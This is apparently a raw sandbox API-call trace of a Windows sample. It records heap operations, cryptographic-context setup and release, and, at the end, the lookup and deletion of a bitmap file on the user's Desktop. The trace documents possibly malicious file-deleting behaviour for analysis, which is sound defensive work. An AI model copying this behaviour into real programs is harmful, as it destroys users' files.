[0200.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0200.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0200.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0200.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0200.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0200.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0200.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0200.696] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0200.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0200.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0200.696] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.697] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0200.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0200.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.697] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0200.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0200.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0200.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0200.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0200.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0200.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0200.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0200.697] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.697] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0200.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0200.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0200.697] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0200.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0200.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0200.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0200.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0200.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0200.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0200.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0200.698] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0200.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0200.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0200.698] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0200.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0200.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0200.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0200.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0200.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0200.698] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0200.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0200.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0200.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0200.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0200.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0200.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0200.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0200.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0200.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0200.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0200.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0200.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0200.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0200.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0200.700] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0200.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0200.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0200.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0200.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0200.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0200.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0200.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0200.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0200.700] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0200.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0200.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0200.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0200.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0200.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0200.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0200.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0200.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0200.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0200.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0200.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0200.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0200.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0200.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0200.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0200.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0200.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0200.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0200.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0200.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0200.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0200.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0200.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0200.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0200.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0200.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0200.702] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0200.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0200.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0200.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0200.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0200.703] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0200.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0200.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0200.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0200.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0200.703] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0200.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0200.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0200.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0200.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0200.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0200.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0200.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0200.703] FreeLibrary (hLibModule=0x756e0000) returned 1 [0200.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0200.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0200.703] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0200.703] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0200.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0200.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0200.704] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0200.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0200.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0200.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0200.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0200.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0200.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0200.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0200.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0200.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0200.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0200.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0200.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0200.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0200.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0200.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0200.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0200.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0200.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0200.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0200.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0200.705] CloseHandle (hObject=0x2a0) returned 1 [0200.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0200.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0200.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0200.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0200.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0200.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0200.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0200.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0200.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0200.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0200.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0200.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0200.707] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0200.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0200.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0200.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0200.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0200.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0200.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0200.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0200.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0200.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0200.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0200.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0200.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0200.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0200.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0200.708] CloseHandle (hObject=0x2d0) returned 1 [0200.778] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0200.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0200.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0200.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0200.780] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0200.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0200.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0200.781] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0200.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0200.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0200.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0200.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0200.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0200.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0200.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0200.781] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/P52g8.bmp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\P52g8.bmp", lpFilePart=0x8cedf4*="P52g8.bmp") returned 0x21 [0200.781] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\P52g8.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\p52g8.bmp")) returned 0x20 [0200.782] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\P52g8.bmp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd23700b0, ftCreationTime.dwHighDateTime=0x1d5e434, ftLastAccessTime.dwLowDateTime=0x27023710, ftLastAccessTime.dwHighDateTime=0x1d5e208, ftLastWriteTime.dwLowDateTime=0x27023710, ftLastWriteTime.dwHighDateTime=0x1d5e208, nFileSizeHigh=0x0, nFileSizeLow=0x14227, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="P52g8.bmp", cAlternateFileName="")) returned 0xa87250 [0200.782] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\P52g8.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\p52g8.bmp")) returned 1 [0201.033] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd23700b0, ftCreationTime.dwHighDateTime=0x1d5e434, ftLastAccessTime.dwLowDateTime=0x27023710, ftLastAccessTime.dwHighDateTime=0x1d5e208, ftLastWriteTime.dwLowDateTime=0x27023710, ftLastWriteTime.dwHighDateTime=0x1d5e208, nFileSizeHigh=0x0, nFileSizeLow=0x14227, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="P52g8.bmp", cAlternateFileName="")) returned 0 